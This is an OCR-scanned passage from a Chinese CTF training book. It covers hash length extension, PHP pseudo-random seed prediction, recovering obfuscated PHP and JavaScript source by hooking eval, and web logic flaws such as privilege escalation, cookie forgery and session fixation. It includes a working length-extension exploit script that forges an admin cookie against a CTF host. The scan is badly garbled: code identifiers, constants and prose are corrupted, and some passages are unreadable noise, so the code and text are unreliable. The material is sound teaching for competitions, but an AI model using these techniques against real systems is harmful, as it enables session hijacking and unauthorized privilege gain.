不 会 受到 之 前 分 组 中 信息 的 影响 导致 了 可 以 在 保证 


Hash 运 算 结果 正确 的 情况 下 ， 将 任意 payload 添 加 至 原 信 息 的 尾部 。 





















我 们 以 Backdoor CTF 2017 中 的 Extends Me 为 例 ， 题 目 中 提供 了 相应 的 源码 (https://github. 
rad TA ATA EI At le ool AN A 


COom 


username = str(request.form.get('username')) 
if request.cookies.get('data') and request.cookies.get('user'): 
data = str(request.cookies.get('data')).decode('base6d4').strip() 
User = str(request.cookies.get('user')).decode('base64').strip() 
temp = '|'.join([key,username,user]) 
if data != SLHAl(temp) .digest(): 
temp = SLHAl(temp).digest().encode('base6d4').strip().replace('\n','') 
resp = make_response(render_template('welcome_new.html', name = username)) 
resp.set_cookie('user', 'user' .encode('base64').strip()) 
resp.set_cookie('data' ,temp) 
return resp 
else: 


if 'admin' in user: # too lazy to check properly :p 
return "Here you go : CTF{XXXXXXXXXXXXXXXXXXXXXXXXX}" 
else: 












return render_tempLate('weLcome_back .htmL' ,name = username) 


在 login 国 数 中 ， 通 过 post 方 式 传 入 username， 在 Cookie 中 传 入 data 和 user 的 值 。 其 中 ， 9 二 
1 (key|username|user) 的 结果 。 在 这 个 签名 过 程 中 ，key 为 未 知 参 数 ，username 可 控 ，user 可 
控 。 只 有 在 data 中 的 内 容 与 SLHA1 签 名 后 的 结果 相同 时 ， 才 会 返回 flag.。 


再 观察 SLHA1 函 数 ， 可 以 友 现 ， 它 是 一 种 类 似 SHA1 算 法 的 Hash 算 法 ,但 修改 了 其 中 的 填充 和 链接 变 
量 ， 所 以 SLHA1 算 法 也 会 受到 HLE 的 威胁 。 


def __init__(self, arg=''): 
# 修改 了 初始 的 链接 变量 
self._h = [9x67452361， 
QxEFCDA189, 
Qx98BADCFE, 
Qx10365476, 
QxC3F2E1F0, 
9x6A756A7A] 


















def _produce_digest(self): 
message = self._unprocessed 
message_byte_Length = self._message_byte_length + len(message) 
# 修改 了 函数 的 填充 部 分 
message += b'\xfd' 
message += b'\xab' * ((56 - (message_byte_Length + 1) % 64) % 64) 
message_bit_length = message_byte_Length * 8 
message += struct.pack(b'>Q', message_bit_lLength) 
h = _process_chunk(message[:64], *self._h) 
















那么 ， 此 时 的 解 题 的 思路 是 将 admin 这 一 字符 串 填 宛 全 user 的 末尾 。 我 们 可 以 按照 修改 后 的 思路 对 程 
序 进行 修改 ， 完 成 喻 希 长 度 扩展 。 


from hash import SLHAl 
import requests 
import struct 


def extend(digest, length, ext): 
# 对 原来 的 字符 串 进行 填充 
pad = '\xfd!' 
pad += '\xab' * ((56 - (Length + 1) % 64) % 64) 
pad += struct.pack('>Q', length * 8) 
slha = SLHA1() 
# 将 原来 的 hash 结果 作为 中 间 结 果 赋 值 给 链接 变量 
slha._h = [struct.unpack('>I', digest[ixd4:ixd+4])[0] for i in range(6)] 
# 因为 我 们 是 从 中 间 结 果 开 始 运 算 ， 所 以 需要 将 消息 的 长 度 修 改 为 完成 填充 、 补 长 度 后 的 长 度 
slha._message_byte_length = length + len(pad) 
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# 向 message 后 添加 payLoad 
slha.update(ext) 
return (pad + ext, slha.digest()) 


post = {'username': 'username'''} 


cookies = {'data': 'KpqBaFCA/oL2hd3almvREbzSQ3SzxHX9', 
'user': 'dXNlcg==" 


orig_digest = cookies['data'].decode('base6d') 
orig_user = cookies['user'].decode('base64') 
min_len = len('|'.join(['?', post['username'], orig_user])) 


for Length in range(min_len, min_len+64): 
print('[+] Trying length: {}'.format(Length)) 
ext, new_digest = extend(orig_digest, length, 'admin') 
cookies['data'] = new_digest.encode('base64').strip().replace('\n', '') 
cookies['user'] = (orig_user + ext).encode('base64').strip().replace('\n', '') 
r=requests.post('https://extend-me-please.herokuapp.com/Llogin', data=post, cookies=cookies) 
if "CTF{" fn r,text: 
print(r.text) 
break 


# [+] Trying length: 29 
# [+] Trying Length: 30 
# [+] Trying length: 31 
# [+] Trying length: 32 
# [+] Trying length: 33 
# Here you go : CTF{4Lw4dy3_u53_hmudc_fegr_4u7h} 


这 里 爆破 的 长 度 是 一 个 范围 ， da 所 以 需要 填充 的 内 容 的 长 度 无 法 
确定 。 在 算法 正确 的 情况 遍历 方式 ， 在 key 的 长 度 正确 上 时， 服务 器 会 将 flag 返 


3.3.1.7 伪 随 机 数 


在 密码 学 中 ， 伪 随机 数 也 是 一 个 重要 的 概念 。 但 是 软件 并 不 能 生成 真 随机 数 。 用 不 安全 的 库 生 成 的 伪 
随机 数 不 够 随机 ， 也 是 CTF 比 赛 中 的 一 个 考点 。 


伪 随 机 数 的 生成 实现 一 般 是 “算法 + 种 子 ”。PHP 中 有 mt_rand 和 rand 两 种 生成 伪 随 机 数 的 为数 ， 它 
们 对 应 的 播种 函数 为 mt srand 和 srand。 在 seed 相 同时 ， 不 论 生 成 多 少 次 ， 它 们 产生 的 随机 数 总 是 相 
同 的 ， 以 下 程序 输出 的 随机 数 见 图 3-3-17。 


<?php 
$seed = 1234; 
mt_srand($seed); 
for($i=0; $i<10; $i++) { 
echo mt_rand()."\n"; 
} 


$seed = 9876; 

srand($seed); 

for($i=0; $i<10; $i++) { 
echo rand()."\n"; 


假如 以 某 种 万 式 我 们 得 到 了 服务 器 所 使 用 的 种 子 ， 不管 是 固定 值 还 是 时 间 截 ， 我 们 都 可 以 对 之 后 生成 
的 伪 随 机 数 进行 预测 。 


在 rand 遂 数 中 ， 如 果 没 有 调用 srand， 那 么 产生 的 随机 数 则 有 规律 可 循 ， 即 : 


411284887 


940613158 

1314588282 
1686544716 
1656482812 
1674985287 
1848274264 
J 34932277 

1173414163 
93 F092 
1649468899 
1935164921 
1011658253 
1646839988 
552667836 


A 
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图 3-3-17 


state[i]=state[i-3]+state[i-31] 


此 外 ， 在 每 次 调用 mt_rand 时 ，PHP 都 会 检查 是 否 已 经 播种 。 如 果 已 经 播种 ， 束 直接 产生 随机 数 ， 梧 
则 自动 播种 。 自 动 播种 时 ， 使 用 的 种 子 范围 为 0 ~ 23<， 而 且 在 每 个 PHP 处 理 的 进程 中 ， 只 要 进行 了 自 
动 播种 ， 残 会 一 目 使 用 这 个 种 和子， 直到 该 进程 被 回收 。 所 以 ， 我 们 可 以 在 保持 连接 keep-alive 时 ， 根 
据 前 几 次 随机 数 生成 的 结果 ， 使 用 php_mt_seed 工 具 对 种 子 进行 爆破 ， 从 而 达到 预测 随机 数 的 目的 。 


虽然 我 们 只 对 PHP 的 伪 随 机 数 进 行 了 说 明 ， 但 是 实际 上 ， 其 他 语言 中 也 存在 伪 随 机 数 的 强 弱 的 问题 ， 
如 Python 中 ， 见 图 3-3-18。 


在 应 对 此 类 题目 的 时 候 可 以 查阅 相关 的 官 万 文档 中 相关 立 数 的 介绍 ， 如 果 生成 的 伪 随 机 数 可 以 被 预 
UP Uy bE SNE Eyl SE EE A 


图 3-3-18 


De Pe Uang getlranNd 0 
example, use rand(5, 15). 


Caution This function does not generate cryptographically secure values, and should not be 
used for cryptographic purposes. If you need a cryptographically secure value, consider using 


random_int(), random_bytes(), or openssL_random_pseudo_bytes() instead. 





Note: On some platforms (such as Windows), getrandmax() is only 32767. If you require a 
3-3-19 


The random module also provides the SystemRandom class Which uses the system function 
os.urandom( ) to generate random numbers from sources provided by the operating system. 


Warning: The pseudo-random generators of this module should not be used for security purposes. 
For security or cryptographic uses, see the secrets module. 
See also: M. Matsumoto and T. Nishimura，“Mersenne Twister: A 623-dimensionally 


图 3-3-20 


3.3.1.8 密码 学 小 结 

上 文 介绍 的 几 种 密码 学 的 攻击 万 式 和 例子 只 是 少 部 分 Web 与 Crypto 结 合 的 产物 ,但 是 密码 学 重点 不 
止 这 些 ， 如 分 组 加 密 模式 中 依然 有 可 以 被 重 放 攻 击 的 CFB 模 式 ， 可 以 被 位 反 转 攻击 影响 的 CTR 模 式 ,， 
甚至 其 他 流 加 密 算法 。 虽 然 没 有 与 Web 相 结合 的 例子 ， 但 是 依然 可 以 成 为 以 后 出 题 人 的 天 注 操 ， 出 现 
在 题目 中 。 所 以 ，Web 参 赛 者 也 要 懂得 一 些 密码 学 的 知识 ， 识 别 一 个 加 密 算法 是 人 否 易 受到 攻击 ， 并 将 
题目 中 获取 的 数据 和 需要 构造 的 字符 串 即 时 交 给 队 内 的 密码 学 大 佬 ， 最 终 达到 题目 中 的 要 求 。 


3.3.2 Web 中 的 他 同 工 程 


3.3.2.1 Python 


在 CTF 比 赛 时 ,一些 目标 可 能 存在 任意 文件 下 载 漏 洞 但 对 可 以 下 载 的 文件 类 型 进行 了 限制 ， 如 Python 
中 禁止 下 载 .py 文件 。Python 在 运行 时 为 了 加 速 程序 运行 ， 因 此 会 将 .py 文件 编译 为 .pyc 或 .pyo 文 件 ， 
通过 恢复 这 些 文件 中 的 字 节 码 信息 ， 同 样 可 以 获得 原 程序 的 代码 。 
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比如 ， 在 LCTF 2018 的 L playground2 中 ， 关 键 代 码 见 图 3-3-21， 文 件 下 载 的 接口 限制 了 不 能 直接 下 
载 .py 文件 ， 但 可 以 下 载 相应 的 .pyc 文 件 进行 反 编 译 ， 获 得 源 代 码 ， 见 图 3-3-22。 


def parse file(path) : 
filename = os.path.join(sandbox_dir, path) 
if "./" in filename or ".." in filename: 
return “invalid content in url” 
if not filename.startswith(base_ dir): 
return “Url have to start with %s"” % base dir 


if filename.endswith("py") or "flag” in filename: 


return “jinvalid content in filename” 


if os.path.isdir(filename): 
file list = os.listdir(filename) 
return ", ".join(file list) 
elif os.path.isfile(filename): 
with open(filename, "rb") as f: 
content = f.read() 
return content 
else: 
return "can't find file” 


图 3-3-21 


图 3-3-22 


3.3.2.2 PHP 


CTF Web 比 赛 中 很 可 能 碰 到 对 代码 进行 加 密 的 情况 。 为 了 理解 PHP 加 密 ， 我 们 需 知 道 PHP 在 运行 时 不 
会 被 直接 执行 ， 而 是 经 过 一 次 编译 ， 执 行 编译 后 的 Opcode， 其 中 有 三 个 重要 的 函数 ， 分 别 是 zend _ 

_fle、zend_compile_string、zend_execute。 利 见 的 加 密 方法 有 对 问 文件 进行 加 密 、 对 代码 
进行 加 密 、 实 现 虚 拟 机 等 方式 ， 由 于 加 密 方式 的 不 同 解密 时 也 会 根据 不 同 算法 ， 调 用 解密 插件 修改 后 
的 编译 或 执行 函数 。 


ompile 


传统 的 PHP 加 密 方案 只 是 在 PHP 代 码 的 基础 上 ， 通 过 代码 混 清 的 万 式 破坏 其 可 读 性 ， 通 过 这 对 最 终 执 
行 代码 进行 解密 ， 再 通过 eval 将 解密 的 结果 执行 。 对 于 这 类 题目 ， 既 然 我们 知道 它 最 终 通 过 eval 将 代 
码 进行 解密 ， 那 么 直接 通过 hook eval 执 行 过 程 。 在 PHP 的 扩展 中 ， 在 初始 化 时 将 zend_compile file 
蔡 换 为 我 们 自行 编写 的 消 数 ， 在 每 次 执行 的 时 候 输 出 其 参数 ， 束 能 将 解密 的 结果 输出 。 


例如 ，phpjiami 束 采取 了 这 种 方法 。 在 PWNHUB 中 ，“ 傻 fufu 的 工作 日 ”一 题 殊 采 用 了 这 种 加 密 方 
式 。 题 目 源 代 码 网 址 为 https://github.comy/CTFTraining/pwnhub 2017 open weekday。 题 
目 提供 了 由 phpjiami 处 理 后 的 备份 文件 ， 可 以 直接 下 载 如 密 后 的 代码 ， 见 图 3-3-23。 


人 09011006) (19 wwYYYWTYYWYYITYYYYYYTINAYAAYT CT 和 0°05, .000)))) re nd intion 
人 OOOO0 FE000 50000 
oe 0 0" bse6s 0000 SOOO000"TO O00 O00 | OOO00 O00 "O00 00 O00000 ) O00 -00 0000 99 JIOOO00000 500000 000 NO | ;5000 
00 2 ) S00070- O00 0 000 -00 0 ) 1000701000000000-500099 
从 从 从 从 从 人 从 从 从 (5 伯 从 从 介 们 全 仆人 S (SE 们 全 个 ) ;5 从 自生 全 自 们 们 全 的 11] 耻 介 全 们 (和 全 "5 人 O50 0 0 [5 nyt A 3590992960 人) 
《人 (人 人 yA 分 全 人 人 人 AAA 人 名 rn 全 全 全 全 全 人 信人 人 人 人 放生 0) 
AAA 15 人 人 信人 人 4 09)): po 0410 


图 3.3-23 
网 络 上 有 很 多 编写 好 的 hook eval 插 件 源 代码 ， 如 https://github.com/bizonix/evalhook 


https://weread.qq.com/web/reader/77d32500721a485577d8eeekb6d32b90216b6d767d2f0Odc 





2021/1/16 从 0 到 1 : sd L 号 队 - 微 信 读 书 
编译 并 加 载 到 PHP 中 ， 再 运行 我 们 的 源码 ， 融 可 以 得 到 真正 的 源 代 码 ， 见 图 3-3-24。 


除了 使 用 这 种 方式 进行 代码 混淆 ， 使 用 插件 对 代码 进行 加 密 也 是 一 种 方式 。 这 种 加 密 方式 通过 对 PHP 
底层 的 zend_compile * 进 行 hook， 在 hook 后 的 函数 中 进行 解密 操作 ， 再 将 解密 后 的 源 代码 传 给 PHP 
的 相关 执行 函数 。 对 于 这 种 类 型 的 加 密 ， 我 们 仍然 可 以 使 用 hook eval 类 似 的 方式 进行 解密 。 


比如 ， 在 SCTF 2018 的 Simple PHP Web 中 ， 源 代码 地 址 如 下 : https://github.com/CTFTraining/ 

_2018_babysyc.git。 通 过 文件 包 合 漏洞 直接 读 取 index.php 源 代码 友 现 是 乱码 ， 怀 疑 代码 进行 过 
加 密 。 通 过 对 phpinfo.php 的 观察 ， 我 们 友 现 服务 器 局 动 了 encrypt_ i 那么 在 指定 插件 目录 
下 下 载 该 插件 。 分 析 该 加 密 插件 ， 该 加 密 对 zend_compile file 进 行 了 hook， 见 图 3-3-25。 


再 观察 encrypt_compile file 中 的 远 辑 。 在 函数 执行 的 最 后 ， 加 密 程序 直接 将 解密 后 的 结果 传 回 了 最 
开始 的 zend_ compile file， 见 图 3-3-26， 此 时 只 需 调 整 hook 插 件 与 解密 插件 的 位 置 ， 让 hook 函 数 
在 解密 函数 后 被 调用 ， 残 可 以 输出 解密 后 的 代码 ， 见 图 3-3-27。 


图 3-3-24 
nk63 zm startup encrypt php() 


compiler globals[135] |= 1u; 

org_compile file = zend compile file; 
zend compile file = encrypt compile file; 
return QLL; 


图 3-3-225 


if ( get active function name() ) 


v4 = (const char *)get active function name(); 
strncpy((char *)&v8, v4, Ox1iEuLL); 
if ( (_BYTE)v8 ) 


if ( !strcasecmp((const char *)&v8, "show source”) || !strcasecmp((const char *)&v8, " 
return QOLL; 
} 
} 


V2 = (const char *)*((_ QWORD *)al + 1)3 
if ( !strstr(*((const char **)al + 1), "://") ) 


v5 = fopen(v2, "rb+"); 
if ( v5 || (v5 = (FILE *)zend fopen(*(( QWORD *)al + 1), al + 4)) != 6LL ) 
{ 


v6 = *al; 
if ( *al == 2 ) 


fclose(*((FILE **)al + 3)); 
V6 = *al; 


} 

if ( v6 == 1 ) 
close(al[6]); 

v7 = sub 3278(v5); 

*al = 2; 


*((_ QWORD *)al + 3) = v7; 


} 
return Seeonpilad tile(al, a2); 


图 3-3-26 
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图 3-3-27 
另 一 种 加 密 方式 是 对 已 经 编译 后 的 Opcode 进 行 处理 ， 此 时 监控 zend_compile * 并 不 会 有 任何 效果 ， 
因为 加 密 根本 没有 使 用 PHP 进 行 编译 ， 而 是 直接 解密 得 到 Opcode 并 执行 。 由 于 编译 的 过 程 没有 起 作 
用 ， 因 此 只 能 hook 函 数 zend_execute， 甚 至 其 中 真正 执行 代码 的 zend_execute_ ex， 从 中 得 到 
后 再 进行 分 析 。PHP 的 vld 扩 展 提 供 了 对 Opcode 进 行 分 析 的 工具 ， 需 要 修改 vld 的 源 代码 , 将” 
OpCode 的 代码 加 到 vid_execute ex 中 ， 然 后 人 工分 析 opcode， 就 能 逐步 分 析出 加 密 的 结果 。 。“ 


static void vld_execute_ex(zend_execute_data *execute_data TSRMLS_DC) { 
vld_dump_oparray(&execute_data->func->op_array); 
return old_execute_ex(execute_data TSRMLS_DC); 
// nothing to do 

} 


例如 ，RCTF 2019 中 的 Sourceguardian 一 题 ， 我 们 看 到 sg _ load 为数 和 题目 名 字 的 提示 可 癌 ， 代 码 使 
用 sourceguardian 加 密 ， 见 图 3-3-28， 使 用 修改 后 的 vld， 可 以 将 Opcode 导 出 。 


图 3-3-28 


一 


图 3-3-28 ( 续 ) 


对 Opcode 进 行 分 析 后 ， 即 可 逐步 恢复 源 代 码 ， 见 图 3-3-29。 


加 E3223 


https://weread.qq.com/web/reader/77d32500721a485577d8eeekb6d32b90216b6d767d2f0Odc 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 
还 有 一 种 最 复杂 的 加 密 方式 ， 即 重新 实现 一 个 VM， 将 PHP 的 源 代码 编译 生成 的 opcode 加 密 ， 混 清 为 
仅 能 被 自 定 义 的 VM 理 解 的 样式 ， 交 给 自 定 义 的 VM 进 行 解 析 。 其 中 典型 的 例子 如 VMP， 由 于 需要 完 
成 对 虚拟 机 、 代 码 的 共同 分 析 ， 工 作 量 巨大 ， 故 很 难 实现 解密 。 


3.3.2.3 JavaScript 


不 管 怎样 ，JavaScript 加 密 最 终 会 将 解密 后 的 结果 交 给 JavaScript3 引 掌 来 执行 ， 由 上 我 们 只 需 像 解 密 。 
一 样 ， 为 其 中 的 关键 函数 加 入 hook， 就 可 以 完成 解密 了 。 


如 在 大 多 数 情 况 下 ， 加 密 的 代码 在 进行 解密 后 ， 如 果 想 再 次 被 执行 ， 只 能 通过 调用 eval 等 函数， 那么 


我 们 可 以 将 eval 遂 数 修 改 为 打印 的 消 数 ， 不 让 其 执行 ， 而 是 输出 ， 束 可 以 得 到 其 中 的 关键 代码 。 


window.eval = function() { 
console.log('eval', JSON.stringify(arguments)) 


一 些 代码 可 能 对 开发 者 工具 进行 检测 ， 对 于 这 种 反 调试 方式 ,我们 可 以 通过 BurpSuite 的 代理 功能 ， 
删除 其 中 反 调 试 部 分 的 代码 。JavaScript 代 码 加 密实 现 的 难度 太 大 ， 所 以 很 多 时 候 只 是 采用 混淆 的 方 
EW ED ey ES 
化 ， 甚 至 通过 Partial Evaluation 技 术 解 决 。 现 在 网 络 上 有 很 多 开源 的 工具 能 对 代码 进行 优化 ， 如 

的 Closure Compiler、FaceBook 的 Prepack、JStillery。 虽然 大 多 数 应 用 是 对 代码 进行 优化 ， 但 ~ 
是 在 优化 的 过 程 中 会 在 编译 期 重 构 AST、 计 算 消 数 、 初 始 化 对 象 等 ， 最 终 呈现 可 读 的 代码 。 
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3.4 逻辑 凋 洞 
逻辑 漏洞 是 指 在 程序 开发 过 程 中 ， 由 于 对 程序 处 理 逻 辑 未 进行 严密 的 考虑 ， 导 致 在 到 达 分 支 逻辑 功能 
时 ， 不 能 进行 正常 的 处 理 或 导致 某 些 错误 ， 进 而 产生 危害 。 


一 般 而 言 ， 功 能 越 复杂 的 应 用 ， 权 限 认 证 和 业务 处 理 流 程 越 复杂 ,开发 人 员 要 考虑 的 内 容 会 大 幅 增 
加 ， 因 此 对 于 功能 越 复 杂 的 应 用 ， 开 友人 员 出 现 足 忽 的 可 能 性 束 越 大 ， 当 这 些 出 现 足 忽 的 点 会 造成 业 
务 功能 的 异 间 执行 时 ， 逻 辑 漏洞 便 形 成 了 。 由 于 逻辑 漏洞 实际 依托 于 正 划 的 业务 功能 人 存储， 因此 业务 
功能 的 不 同 直接 导致 每 个 逻辑 漏洞 的 利用 都 不 相同 ， 也 残 无 法 像 ?QL 注 入 漏洞 总 结 出 一 个 通用 的 利用 
流程 或 绕 过 方法 ， 而 这 对 于 测试 人 员 在 业务 逻辑 梳理 方面 便 有 着 更 高 的 要 求 。 


与 前 面 的 SQL 注入 、 文 件 上 传 等 传统 漏洞 不 同 ， 如 果 仅 从 代码 层面 分 析 ， 逻 辑 漏洞 通 冲 是 难以 发 现 
的 。 因 此 ， 传 统 的 基于 “输入 异常 数据 一 得 到 异常 响应 ”的 漏洞 扫描 器 对 于 逻辑 漏洞 的 发 现 通常 也 是 
无 力 的 。 目 前 ， 对 于 逻辑 漏洞 的 挖掘 方 法 仍 以 手工 测试 为 主 ， 并 且 由 于 与 业务 功能 密切 相关 ， 也 就 与 
测试 人 员 的 经 验 密 切 相 关 。 


3.4.1 单 见 的 逻辑 漏洞 

由 于 逻辑 漏洞 实际 依托 于 正常 的 业务 功能 存在 ， 无 法 总 结 出 一 个 对 所 有 逻辑 漏洞 行 之 有 效 的 利用 方 
法 ， 但 是 对 于 这 些 逻 辑 漏 洞 而 言 ， 导 致 其 发 生 的 原因 存在 一 定 共性 ， 赁 此 可 以 将 这 些 逻 辑 漏洞 进行 一 
个 粗略 的 分 类 ， 归 结 为 两 种 : 权限 问题 、 数 据 问题 。 


1. 与 权限 相关 的 逻辑 漏洞 


我 们 先 了 解 什么 是 权限 相关 的 逻辑 漏洞 。 在 正常 的 业务 场景 中 ， 绝 大 多 数 操作 需要 对 应 的 权限 才能 进 
行 。 而 荣 见 的 用 户 权限 如 匿名 访客 、 音 通 登 录用 户 、 会 员 用 户 、 管 理 员 等 ， 都 拥有 其 各 自 所 特有 的 权 
限 操作 。 匿 名 访客 权限 可 执行 的 操作 如 浏览 信息 、 搜 索 特定 内 容 等 ， 而 登录 权限 则 可 以 确认 订单 文 
付 ， 会 员 权 限 可 以 提前 预约 等 ， 这 些 操作 与 用 户 所 拥有 的 权限 息息相关 。 


当权 限 的 分 配 、 确 认 、 使 用 这 些 过 程 出现 了 问题 ， 导 致 某 些 用 户 可 执行 他 本 身 权限 所 不 支持 的 特权 操 
作 ， 此 时 便 可 称 为 友 生 了 与 权限 相关 的 逻辑 漏洞 。 


权限 逻辑 漏洞 中 常见 的 分 类 为 未 授权 访问 、 越 权 访问 、 用 户 验 证 缺陷 。 


未 授权 访问 是 指 用 户 在 未 经 过 授权 过 程 时 ， 能 直接 获取 原本 需要 经 过 授权 才能 获取 的 文本 内 容 或 页 面 
等 信息 。 其 实质 是 由 于 在 进行 部 分 功能 开发 时 ， 未 添加 用 户 身份 校 验 步骤 ， 导 致 在 未 授权 用 户 访问 相 
应 功能 时 ,没有 进行 有 效 的 身份 校 验 ， 从 而 浏览 了 他 原 有 权限 不 支持 查看 的 内 容 ， 也 就 是 导致 了 未 授 
权 访 问 ( 见 图 3-4-1) 。 


越权 访问 主要 为 横向 越权 和 纵向 越权 。 横 向 越权 漏洞 指 的 是 权限 同 级 的 用 户 之 间 发 生 的 越权 行为 ， 在 
这 个 过 程 中 ， 权 限 始终 限制 在 同一 个 级 别 中 ， 因 此 被 称 为 横向 。 与 之 相对 ， 纵 向 越权 漏洞 则 指 在 权限 
不 同 级 的 用 户 之 间 友 生 了 越权 行为 ， 并 且 通 弟 是 用 来 摘 述 低级 权限 用 户 向 高 级 权限 用 户 的 越权 行为 。 


kd 
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止 帅 琛 必 


图 3-4-1 
假设 存在 两 个 用 户 A 和 B， 各 自 拥 有 3 种 行为 的 权限 ， 见 图 3-4-2。 


会 员 身 份 赋予 
商户 销售 权限 控制 
Ce ] 


查看 历史 订单 


Ce 
修改 个 人 信息 


图 3-4-2 
横向 越权 即 用 户 A 与 用 户 B 之 间 的 越权 ， 如 用 户 A 可 碍 看 用 户 B 的 历史 订单 信息 ， 其 中 权限 变更 过 程 为 
“普通 用 户 一 普通 用 户 ” ( 见 图 3-4-3) ， 本 质 的 权限 等 级 未 变化 。 


用 户 B 专 属 操作 


查看 历史 订单 


修改 个 人 信息 


图 3-4-3 
纵向 越权 则 会 涉及 管理 员 与 用 户 之 间 的 权限 变更 ， 如 用 户 A 通 过 越权 行为 可 对 首页 广告 进行 编辑 ， 那 
么 权限 变更 过 程 为 “普通 用 户 一 高 级 权限 用 户 ”， 本 质 的 权限 等 级 太 生 了 变化 。 


用 户 验证 缺陷 通常 会 涉及 多 个 部 分 ， 包 括 登 录 体 系 安 全 、 密 码 找 回 体系 、 用 户 身份 认证 体系 等 。 通 常 
而 言 ， 最 终 目 的 都 是 获取 用 户 的 相应 权限 。 以 登录 体系 为 例 ， 一 个 完整 的 体系 中 人 至少 包括 : 用 户 名 密 
三 


份 校 验 ， 当 用 户 通 过 一 个 配对 的 用 户 名 与 密码 登录 至 业务 系统 后 ， 会 被 分 配 一 个 Cookie (Session) 
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值 ， 通 常 表现 为 唯一 的 字符 串 ， 服 务 端 系统 通过 Cookie (Session) 实现 对 用 户 身份 的 判断 ， 见 图 3- 
4-4。 


携带 用 户 A 的 Cookie 携带 用 户 B 的 Cookie 


—~ ES 


识别 为 用 户 A 识别 为 用 户 B 客户 端 B 


图 3-4-4 


打开 浏览 器 的 控制 台 ， 通 过 JavaScript 可 以 查看 当前 页 面 拥 有 的 Cookie， 见 图 3-4-5。 或 者 在 网 络 请 
求 部 分 也 可 以 查看 当前 页 面 Cookie， 见 图 3-4-6。 


k 
¢ "ga=GA1.2.127672999.1555479593; _gid=GA1.2.107753667.1557891485; Hm_tLvt_edc3c99a0382806fc3a47d6c11483da6= 
1555478594,1556777969,1557801485,1557836174; Hm_tpvt_edc3c09a0382896fc3a47d6cll1483da0=1557836174" 


cookie: _ga=GA1.2.127672999.1555470593; _gid=GA1.2.107753667.1557801485; Hm_Lvt_edc3c09a038 
2896fc3a47d6c11483da0=1555476594,1556777969,1557801485,1557836174; Hm_tLpvt_edc3c09a0382866 
fc3a47d6c11483da0=1557836174 


图 3-4-6 
Cookie 数 据 以 键 值 对 的 形式 展现 ， 修 改 数值 后 ， 对 应 Cookie 键 的 内 容 便 同 时 被 修改 。 若 Cookie 中 用 
于 验证 身份 的 键 值 对 在 传输 过 程 中 未 经 过 有 效 保护 ， 则 可 能 被 攻击 者 自 改 ， 进 而 服务 端 将 攻击 者 识别 
为 正常 用 户 。 假 设 用 于 验证 身份 的 Cookie 键 值 对 为 “auth priv=guest”， 当 攻击 者 将 其 修改 为 “ 


a 
_priv=admin” 时 ， 服 务 端 会 将 攻击 者 的 身份 识别 为 admin 用 户 ， 而 不 是 正常 的 guest， 此 时 便 
在 Cookie 验 证 身份 环节 产生 了 一 个 Cookie 仿 冒 的 逻辑 漏洞 。 


对 于 session 机制 而 言 ， 由 于 session 存储 于 服务 端 ， 攻 击 者 利用 的 角度 会 发 生 些 许 变化 。 与 Cookie 
校 验 不 同 的 是 ， 当 使 用 Session 校 验 时 ， 用 户 打 开 网 页 后 便 会 被 分 配 一 个 Session ID， 通 常 为 由 字母 
和 数字 组 成 的 字符 串 。 用 户 登 录 后 ， 对 应 的 Session ID 会 记录 对 应 的 权限 。 其 验证 流程 见 图 3-4-7。 


Session 验 证 的 关键 点 在 于 “通过 Session ID 识别 用 户 身份 ”， 在 该 天 键 点 上 对 应 存在 一 个 3ession 会 
话 固 定 攻击 ， 其 攻击 流程 见 图 3-4-8。 


首次 打开 页 面 
分 配 一 个 唯一 的 Session ID 


< 


登录 用 户 A 账 号 


将 用 户 A 的 识别 信息 记录 至 


Session ID 


RE 


根据 Session ID 识别 为 用 户 


图 3-4-7 


打开 页 面 八 “ 
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Se== ID ( 记 为 9 ) 


使 用 登录 ， 获得 B 的 身份 


简单 而 言 ， 其 攻击 流程 如 下 : 攻击 者 打开 页 面 ， 获 得 一 个 3ession ID， 我 们 将 其 称 为 9; 攻击 者 发 送 
一 个 链接 给 受害 者 ， 使 得 受害 者 使 用 S$ 进行 登录 操作 ， 如 http://session.demo.com/login.php? 

-yoomx; 受害 者 B 执 行 登录 后 ，S 对 应 的 Session ID 将 包含 用 户 B 的 身份 识别 信息 ， 攻 击 者 同 
样 可 以 通过 S$ 获得 受害 者 B 的 账号 权限 。 


2. 与 数据 相关 的 逻辑 漏洞 


现实 中 ， 对 于 业务 功能 交织 的 购物 系统 ， 正 常 的 业务 功能 会 涉及 多 种 场景 ， 如 商品 余额 、 金 钱 化 费 、 
商品 归属 判定 、 订 单 修 改 、 代 人 金 券 的 使 用 等 。 以 其 中 的 购买 功能 为 例 ， 购 买 过 程 中 会 涉及 商 忆 商品 余 
额 变 化 、 买 万 金额 的 消费 、 服 务 端 的 交易 历史 记录 等 数据 ， 由 于 涉及 的 数据 种 类 较 多 ， 因 此 在 实际 开 
发 过 程 中 ， 对 于 部 分 数据 的 类 型 校 验 便 存在 考虑 不 周 的 可 能 ， 如 人 花费 金额 的 正 负 判定 、 数 额 是 否 可 更 
改 等 问题 。 这 学 问题 往 往 都 不 是 由 代码 层面 的 漏洞 直接 导致 ， 而 是 由 于 业务 处 理 逻 辑 的 部 分 判断 缺失 
导致 的 。 


与 数据 相关 的 逻辑 漏洞 通常 将 关注 点 放 在 业务 数据 算 改 、 重 放 等 方面 。 


业务 数据 复 改 包含 了 前 文 提 到 的 诸多 问题 ， 与 开 友 人 员 对 正音 业务 所 做 的 合法 规定 密切 相关 ， 如 限购 
行为 中 ， 对 于 最 大 购买 量 的 突破 也 是 作为 业务 数据 自 改 来 看 待 。 除 此 之 外 ， 在 购买 场景 下 常见 的 几 个 
业务 数据 算 改 可 包括 : 金额 数据 修改， 商品 数量 复 改 ， 限 购 最 大 数 修改 ， 优 惠 券 ID 可 修改。 不 同 场景 
下 ， 可 复 改 的 数据 仔 企 差异 ， 需 要 针对 实际 情况 具体 分 析 ， 因 此 上 面 4 类 数据 也 只 是 针对 购买 场景 而 


攻击 者 通过 得 改 业务 数据 可 以 修改 原 定 计划 执行 的 任务 ， 如 消费 金额 的 修改 ， 若 某 支 付 链接 为 http:// 

demo.meizj.com/pay.php? money=1000&purchaser=jack&productid=1001&seller= 

,其 中 ， 各 参数 全 义 如 下 :money 代 表 本 次 购买 所 花费 的 金额 ，purchaser 代 表 购买 者 的 用 户 名 。 ” 
代表 购买 的 商品 信息 ，seller 代 表 售卖 者 用 户 名 . Ba 


若 后 台 的 购买 功能 是 通过 这 个 URL 来 实现 的 ， 那 么 业务 逻辑 可 以 描述 为 “purchaser 花 费 了 money 向 
